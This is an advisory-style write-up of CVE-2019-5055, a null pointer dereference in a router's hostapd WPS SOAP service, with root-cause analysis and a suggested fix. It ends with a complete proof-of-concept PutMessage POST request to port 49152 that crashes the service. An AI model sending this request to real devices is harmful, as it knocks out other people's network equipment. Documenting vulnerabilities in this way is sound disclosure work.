CVE-2019-5055

An unauthenticated attacker sends a specially-crafted SOAP POST request to the <WFAWLANConfig:1#PutMessage> service on the router's hostapd daemon (port 49152) [ref_id=1]. The request triggers a call to wps_process_msg() with a null pointer because the prerequisite GetDeviceInfo() method was never called to populate the required data structure [ref_id=1]. This results in a null pointer dereference [CWE-476] and crashes the hostapd service, causing a denial of service [ref_id=1].

The vulnerable code path is in web_connection_check_data() at address 0x44e5dc, which calls wps_process_msg() (at 0x43cc7c) without validating that the M1 data structure has been populated [ref_id=1]. The crash occurs at wps_process_msg+0 when it dereferences a null pointer in register a0 [ref_id=1].

The advisory does not include a patch or specific remediation code [ref_id=1]. The vulnerability is caused by the lack of validation in web_connection_check_data() to verify that M1 data has been received via GetDeviceInfo() before calling wps_process_msg() [ref_id=1]. A proper fix would add a check to ensure the required structure is non-null before passing it to wps_process_msg(), or enforce the correct SOAP method sequence so that PutMessage cannot be called before GetDeviceInfo [ref_id=1].

Send the following SOAP POST request to the router at port 49152:

``` POST /wps_control HTTP/1.1 SOAPAction: "urn:schemas-wifialliance-org:service:WFAWLANConfig:1#PutMessage" Host: 192.168.1.1:49152 Content-Type: text/xml Content-Length: 357

<?xml version="1.0"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> .<m:PutMessage xmlns:m="urn:schemas-wifialliance-org:service:WFAWLANConfig:1"> <NewInMessage>AAAA</NewInMessage> .</m:PutMessage> </SOAP-ENV:Body> </SOAP-ENV:Envelope> ```

This causes a null pointer dereference in wps_process_msg(), crashing the hostapd service [ref_id=1].